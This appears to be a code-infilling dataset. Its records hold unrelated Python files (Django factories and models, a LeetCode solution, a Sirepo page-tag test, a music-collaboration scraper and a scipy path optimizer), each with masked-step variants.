models.RegularPressRelease\n\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(\n lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n 
article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n\n\n",
"step-ids": [
22,
39,
42,
45,
47
]
}
|
[
22,
39,
42,
45,
47
] |
from typing import List


class Solution:
    def uncommonFromSentences(self, A: str, B: str) -> List[str]:
word_count = {}
A = A.split()
B = B.split()
whole = A + B
for word in whole:
if word not in word_count:
word_count[word] = 1
else:
word_count[word] += 1
return [word for word in word_count if word_count[word] == 1]
|
normal
|
{
"blob_id": "09420360ddcf2f74c2e130b4e09ae2a959e42e50",
"index": 8305,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def uncommonFromSentences(self, A: str, B: str) ->List[str]:\n word_count = {}\n A = A.split()\n B = B.split()\n whole = A + B\n for word in whole:\n if word not in word_count:\n word_count[word] = 1\n else:\n word_count[word] += 1\n return [word for word in word_count if word_count[word] == 1]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
"""Test(s) for static files
:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
import os
_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'
def setup_module(module):
os.environ.update(
SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID,
)
def test_injection(fc):
from pykern import pkcompat, pkunit
from pykern.pkdebug import pkdc, pkdp, pkdlog
from pykern.pkunit import pkeq, pkok, pkre
import re
# test non-static page
r = fc.get('myapp')
pkok(
not re.search(
r'googletag',
pkcompat.from_bytes(r.data)
),
'Unexpected injection of googletag data={}',
r.data
)
# test successful injection
r = fc.get('/en/landing.html')
pkre(_TEST_ID, pkcompat.from_bytes(r.data))
|
normal
|
{
"blob_id": "65b5db0bc6f23c342138060b7a006ff61e2dcf45",
"index": 3761,
"step-1": "<mask token>\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-2": "<mask token>\n\n\ndef setup_module(module):\n os.environ.update(SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID)\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-3": "<mask token>\n_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'\n\n\ndef setup_module(module):\n os.environ.update(SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID)\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-4": "<mask token>\nfrom __future__ import absolute_import, division, print_function\nimport pytest\nimport os\n_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'\n\n\ndef setup_module(module):\n os.environ.update(SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID)\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Test(s) for static files\n\n:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.\n:license: http://www.apache.org/licenses/LICENSE-2.0.html\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport pytest\nimport os\n\n_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'\n\n\ndef setup_module(module):\n os.environ.update(\n SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID,\n )\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n\n # test non-static page\n r = fc.get('myapp')\n pkok(\n not re.search(\n r'googletag',\n pkcompat.from_bytes(r.data)\n ),\n 'Unexpected injection of googletag data={}',\n r.data\n )\n\n # test successful injection\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import dataset
import json
import gc
import os
jsonDir = "/home/jr/share/python/music-visualizer/merged"
db = dataset.connect('sqlite:///test.db')
table = db['Songs']
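# walk the merged JSON directory and insert every artist's songs into the Songs table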
for root, subFolders, files in os.walk(jsonDir):
for f in files:
print("file:{}".format(f))
gc.collect()
tmpJson = json.load(open(os.path.join(root, f)))
for Artist in tmpJson:
for song in tmpJson[Artist]["Songs"]:
table.insert(song)
import urllib2
import json
import re
#in_artist
def byteify(input):
if isinstance(input, dict):
return {byteify(key): byteify(value) for key, value in input.iteritems()}
elif isinstance(input, list):
return [byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
nodes = []
edges = []
anchor = "Rihanna"
q = [anchor]
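# breadth-first walk over artists: fetch each artist's song list and queue any featured artists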
while len(q) > 0:
art = q.pop(0)
#get song list
url = "http://10.104.246.185:5000/artist/"+art.replace(" ", "%20")
response = urllib2.urlopen(url)
dictionary = byteify(json.loads(response.read()))
songlist = []
if (dictionary):
lst = dictionary["Songs"]
for song in lst:
songlist.append(song["Title"])
for song in songlist:
#get string of featured artists
m = re.match('.+[fF]eat. ([^)(/]+)', song)
if m:
s = m.group(1)
#split into artists
lst = s.split(",")
lstend = (lst.pop()).split("&")
lst.extend(lstend)
for a in lst:
a = a.strip()
edges.append((art.strip(),a))
if nodes.count(a) == 0:
q.append(a)
for b in lst:
b = b.strip()
if a != b:
edges.append((a,b))
if nodes.count(art) == 0:
nodes.append(art.strip())
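# drop duplicate edges (in either direction) and self-loops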
i = 0
j = 0
while i < len(edges)-1:
j = i+1
t1 = edges[i]
while j < len(edges):
t2 = edges[j]
if t1[0] == t2[0] and t1[1] == t2[1]:
edges.pop(j)
elif t1[1] == t2[0] and t1[0] == t2[1]:
edges.pop(j)
elif t2[0] == t2[1]:
edges.pop(j)
else:
j = j + 1
i = i + 1
print nodes
print edges
|
normal
|
{
"blob_id": "3461e9dceb2c0bfc49002809154f8be4cd8c66e2",
"index": 1483,
"step-1": "import dataset\nimport json\nimport gc\nimport os\n\njsonDir = \"/home/jr/share/python/music-visualizer/merged\"\n\ndb = dataset.connect('sqlite:///test.db')\ntable = db['Songs']\n\nfor root, subFolders, files in os.walk(jsonDir):\n for f in files:\n print(\"file:{}\".format(f))\n gc.collect()\n tmpJson = json.load(open(os.path.join(root, f)))\n for Artist in tmpJson:\n for song in tmpJson[Artist][\"Songs\"]:\n table.insert(song)\nimport urllib2\nimport json\nimport re\n#in_artist\ndef byteify(input):\n if isinstance(input, dict):\n return {byteify(key): byteify(value) for key, value in input.iteritems()}\n elif isinstance(input, list):\n return [byteify(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf-8')\n else:\n return input\n\nnodes = []\nedges = []\n\nanchor = \"Rihanna\"\n\nq = [anchor]\n\nwhile len(q) > 0:\n art = q.pop(0)\n #get song list\n url = \"http://10.104.246.185:5000/artist/\"+art.replace(\" \", \"%20\")\n response = urllib2.urlopen(url)\n dictionary = byteify(json.loads(response.read()))\n songlist = []\n if (dictionary):\n lst = dictionary[\"Songs\"]\n for song in lst:\n songlist.append(song[\"Title\"])\n for song in songlist:\n #get string of featured artists\n m = re.match('.+[fF]eat. ([^)(/]+)', song) \n if m:\n s = m.group(1)\n #split into artists\n lst = s.split(\",\")\n lstend = (lst.pop()).split(\"&\")\n lst.extend(lstend)\n for a in lst:\n a = a.strip()\n edges.append((art.strip(),a))\n if nodes.count(a) == 0:\n q.append(a)\n for b in lst:\n b = b.strip()\n if a != b:\n edges.append((a,b))\n\n if nodes.count(art) == 0:\n nodes.append(art.strip())\n\ni = 0\nj = 0\nwhile i < len(edges)-1:\n j = i+1\n t1 = edges[i]\n while j < len(edges):\n t2 = edges[j]\n if t1[0] == t2[0] and t1[1] == t2[1]:\n edges.pop(j)\n elif t1[1] == t2[0] and t1[0] == t2[1]:\n edges.pop(j)\n elif t2[0] == t2[1]:\n edges.pop(j)\n else:\n j = j + 1\n \n i = i + 1\nprint nodes\nprint edges\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
permissions = ('restart', )
commands = ('restart', )
def get_command(session, parsed_message):
return 'stop', 'restart'
def parse_response(permission, response):
return response
|
normal
|
{
"blob_id": "acd5cf675522c90fc9fbc96bdeb52f66835626b4",
"index": 3489,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_response(permission, response):\n return response\n",
"step-3": "<mask token>\n\n\ndef get_command(session, parsed_message):\n return 'stop', 'restart'\n\n\ndef parse_response(permission, response):\n return response\n",
"step-4": "permissions = 'restart',\ncommands = 'restart',\n\n\ndef get_command(session, parsed_message):\n return 'stop', 'restart'\n\n\ndef parse_response(permission, response):\n return response\n",
"step-5": "permissions = ('restart', )\ncommands = ('restart', )\n\n\ndef get_command(session, parsed_message):\n return 'stop', 'restart'\n\n\ndef parse_response(permission, response):\n return response\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.db import models
import string
import random
def id_generator(size=32, chars=string.ascii_uppercase + string.digits):
exists = True
while exists == True:
ran = ''.join(random.choice(chars) for _ in range(size))
if len(Item.objects.filter(random_str=ran)) == 0:
exists = False
return ran
# Create your models here.
class Item(models.Model):
name = models.CharField(max_length=999, unique=True)
description = models.TextField(blank=True)
random_str = models.CharField(max_length=999, default=id_generator)
original_price = models.FloatField()
markup_percentage = models.PositiveIntegerField(default=120)
price = models.FloatField(blank=True)
discount_percentage = models.PositiveIntegerField(default=0)
#TODO sizes
img = models.ImageField()
img_2 = models.ImageField(null=True, blank=True)
img_3 = models.ImageField(null=True, blank=True)
img_4 = models.ImageField(null=True, blank=True)
def save(self, *args, **kwargs):
if self.price is None:
self.price = self.original_price * self.markup_percentage / 100
super(Item, self).save(*args, **kwargs)
def __str__(self):
if self.discount_percentage == 0:
return self.name + " - " + str(self.price) + "€"
else:
return self.name + " - " + str( self.price*((100-self.discount_percentage)/100) ) + "€ - DISCOUNT " + str(self.discount_percentage) + "%"
|
normal
|
{
"blob_id": "efba815fe64cddb5315b17b2cbaf1d3fc38c11ee",
"index": 4995,
"step-1": "<mask token>\n\n\nclass Item(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n\n def __str__(self):\n if self.discount_percentage == 0:\n return self.name + ' - ' + str(self.price) + '€'\n else:\n return self.name + ' - ' + str(self.price * ((100 - self.\n discount_percentage) / 100)) + '€ - DISCOUNT ' + str(self.\n discount_percentage) + '%'\n",
"step-3": "<mask token>\n\n\nclass Item(models.Model):\n name = models.CharField(max_length=999, unique=True)\n description = models.TextField(blank=True)\n random_str = models.CharField(max_length=999, default=id_generator)\n original_price = models.FloatField()\n markup_percentage = models.PositiveIntegerField(default=120)\n price = models.FloatField(blank=True)\n discount_percentage = models.PositiveIntegerField(default=0)\n img = models.ImageField()\n img_2 = models.ImageField(null=True, blank=True)\n img_3 = models.ImageField(null=True, blank=True)\n img_4 = models.ImageField(null=True, blank=True)\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n\n def __str__(self):\n if self.discount_percentage == 0:\n return self.name + ' - ' + str(self.price) + '€'\n else:\n return self.name + ' - ' + str(self.price * ((100 - self.\n discount_percentage) / 100)) + '€ - DISCOUNT ' + str(self.\n discount_percentage) + '%'\n",
"step-4": "from django.db import models\nimport string\nimport random\n\n\ndef id_generator(size=32, chars=string.ascii_uppercase + string.digits):\n exists = True\n while exists == True:\n ran = ''.join(random.choice(chars) for _ in range(size))\n if len(Item.objects.filter(random_str=ran)) == 0:\n exists = False\n return ran\n\n\nclass Item(models.Model):\n name = models.CharField(max_length=999, unique=True)\n description = models.TextField(blank=True)\n random_str = models.CharField(max_length=999, default=id_generator)\n original_price = models.FloatField()\n markup_percentage = models.PositiveIntegerField(default=120)\n price = models.FloatField(blank=True)\n discount_percentage = models.PositiveIntegerField(default=0)\n img = models.ImageField()\n img_2 = models.ImageField(null=True, blank=True)\n img_3 = models.ImageField(null=True, blank=True)\n img_4 = models.ImageField(null=True, blank=True)\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n\n def __str__(self):\n if self.discount_percentage == 0:\n return self.name + ' - ' + str(self.price) + '€'\n else:\n return self.name + ' - ' + str(self.price * ((100 - self.\n discount_percentage) / 100)) + '€ - DISCOUNT ' + str(self.\n discount_percentage) + '%'\n",
"step-5": "from django.db import models\nimport string\nimport random\n\ndef id_generator(size=32, chars=string.ascii_uppercase + string.digits):\n\texists = True\n\twhile exists == True:\n\t\tran = ''.join(random.choice(chars) for _ in range(size))\n\t\tif len(Item.objects.filter(random_str=ran)) == 0:\n\t\t\texists = False\n\n\treturn ran\n\n\n\n# Create your models here.\nclass Item(models.Model):\n\tname = models.CharField(max_length=999, unique=True)\n\tdescription = models.TextField(blank=True)\n\trandom_str = models.CharField(max_length=999, default=id_generator)\n\n\toriginal_price = models.FloatField()\n\tmarkup_percentage = models.PositiveIntegerField(default=120)\n\tprice = models.FloatField(blank=True) \n\tdiscount_percentage = models.PositiveIntegerField(default=0)\n\n#TODO suurused\n\n\n\timg = models.ImageField()\n\timg_2 = models.ImageField(null=True, blank=True)\n\timg_3 = models.ImageField(null=True, blank=True)\n\timg_4 = models.ImageField(null=True, blank=True)\n\n\tdef save(self, *args, **kwargs):\n\t\tif self.price is None:\n\t\t\tself.price = self.original_price * self.markup_percentage / 100\n\t\tsuper(Item, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\tif self.discount_percentage == 0:\n\t\t\treturn self.name + \" - \" + str(self.price) + \"€\"\n\t\telse:\n\t\t\treturn self.name + \" - \" + str( self.price*((100-self.discount_percentage)/100) ) + \"€ - DISCOUNT \" + str(self.discount_percentage) + \"%\"",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
from erlport.erlterms import Atom
from scipy.optimize import basinhopping
import numpy as np
import qsim
class Bounds(object):
'''Required for acceptance testing in scipy.optimize.basinhopping'''
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs["x_new"]
return self.is_valid(x)
def SLSQP_constraints(self):
'''Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i'''
        # bind loop variables as defaults so each lambda keeps its own i and c
        funs = [lambda x, i=i, c=c: x[i + 1] - x[i] + c
                for i, c in enumerate(self.costs[1:])]
        funs.append(lambda x: x[0] + self.costs[0])
        funs += [lambda x, i=i: x[i] for i in xrange(len(self.costs))]
        funs += [lambda x: -x[-1]]
        # in matrix form
n = len(self.costs)
# -x_i <= 0
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
# tmax constraints
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
# cost constraints
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n-1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {"slsqp": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},
"cobyla": [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
'''Return bounds as sequence'''
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
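    '''Random step proposal for basinhopping: shrink the step until it lands inside the feasible bounds'''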
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
'''Erlang Entry Point to Optimization Module'''
B_table = parse_behaviours(behaviours)
BTG = parse_edgelist(btg)
F = parse_prediction(prediction)
path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)
return list(path), map(lambda x: int(x) + start, t.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.,
maxiter=20, Acc0=None, method="SLSQP"):
'''
    Perform the mixed ILP optimization (without queues or memory) that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
'''
# Given a particular path, find the optimal times to transition
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,
BTG, t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),
'constraints': bounds.SLSQP_constraints()[method.lower()],
}
result = basinhopping(L, x0.copy(),
accept_test=bounds,
take_step=step_taker, stepsize=10*dt,
niter=maxiter, T=initial_T,
interval=20,
minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),
key=lambda x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0,
q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},
q_relief_model=qsim.linear_relief,
deadtime_penalty=4):
    '''Generates the components necessary to completely specify the
    best-path optimization routine (with a queue model).
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
'''
B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
'''Simulate the queue effects, and then evaluate the objective function
on the simulation result'''
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,
Acc0=Acc0, relief_mode_kwargs={"rate": 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return (-obj(x, B, cum_Z, taus, dt=dt)
+ 0.25* avg_rates.dot(Deadtimes) ** 2
- avg_rates.sum()*Acc.sum()) # ????
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
# Parsers ###############################################################
def parse_edgelist(edges):
'''[((a, b), tau)] -> {(a, b): tau}'''
return {(a, b): tau for (a, b), tau in edges}
def parse_behaviours(behaviours, dtype=np.float32):
'''[(bid, [bvec])] -> {bid: <bvec>}'''
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
'''[[float]] -> np.array(...) of same shape'''
return np.array(F) # Might not work, will check back later
# Optimization ###############################################################
def initial_soln(path, t_max):
'''Evenly Distributed, no check for taus'''
j = t_max / len(path)
return np.array([(i + 1) * j for i in xrange(len(path) - 1)])
def transition_costs(path, btg):
'''Sequence of transition costs associated with the prescribed path'''
return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
'''Penalty brutally dominates any out-of-index operation...'''
z = cum_F.shape[-1] - 1
if (not 0 <= a <= z) or (not 0 <= b <= z):
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
def flow_served(cum_F, times, costs, queue_model=None, dt=1.):
'''Times: [t1, ..., td],
costs: [t_{b0, b1}, t_{b1, b2}, ...]
Returns the Fulfillment matrix associated with each behaviour segment.'''
discr_index = lambda x: int(x / dt) - 1
t_steps = [0] + map(discr_index, times)
t_steps.append(cum_F.shape[-1] - 1) # t_max
c_steps = [0] + map(discr_index, costs)
result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])
for i in xrange(len(costs) + 1)])
return result
def obj(times, B, cum_F, costs, dt=1.):
'''Objective Function for Hillclimbing'''
Z = B * flow_served(cum_F, times, costs, dt=dt)
return Z.sum()
def barrier(times, path, BTG):
'''Handles Linear/causality Constraints with respect to transitions'''
t = [0] + list(times)
S = 0.
for i in xrange(len(path) - 1):
edge = (path[i], path[i + 1])
tau = BTG[edge]
        S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is violated
return S
|
normal
|
{
"blob_id": "0f4bdaecef356e01cbef527d4886564d9ef840fa",
"index": 5573,
"step-1": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\n<mask token>\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return 
paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * 